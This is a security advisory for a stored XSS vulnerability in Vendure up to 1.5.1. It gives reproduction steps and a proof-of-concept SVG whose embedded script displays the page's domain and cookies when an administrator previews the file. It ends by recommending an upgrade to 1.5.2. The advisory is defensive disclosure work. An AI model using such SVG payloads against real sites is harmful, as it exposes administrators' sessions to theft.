Overview
In Vendure versions 0.1.0-alpha.2 to 1.5.1 are affected by Stored XSS vulnerability, where an attacker having catalog permission can upload a SVG file that contains malicious JavaScript into the “Assets” tab. The uploaded file will affect administrators as well as regular users.
Details
The “Vendure” application is affected by “Stored XSS” vulnerability, where an attacker having catalog permission can upload the SVG file that contains malicious JavaScript into the “Assets” tab. The uploaded file will affect administrators as well as regular users.
PoC Details
Access the login page in the browser and login a low-privileged user that has catalog permissions. Now, navigate to the “Assets'' tab from “Catalog” and upload the SVG file with a malicious javascript payload (found in POC Code section). In another browser login with an administrator having super admin privileges. Navigate to “Assets'' from “Catalog” and click on the uploaded SVG file and preview. Once clicking on the link in the right corner, XSS will be triggered.
PoC Code
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain+'
'+document.cookie);
</script>
</svg>
Affected Environments
0.1.0-alpha.2 to 1.5.1
Prevention
Upgrade version to 1.5.2 or higher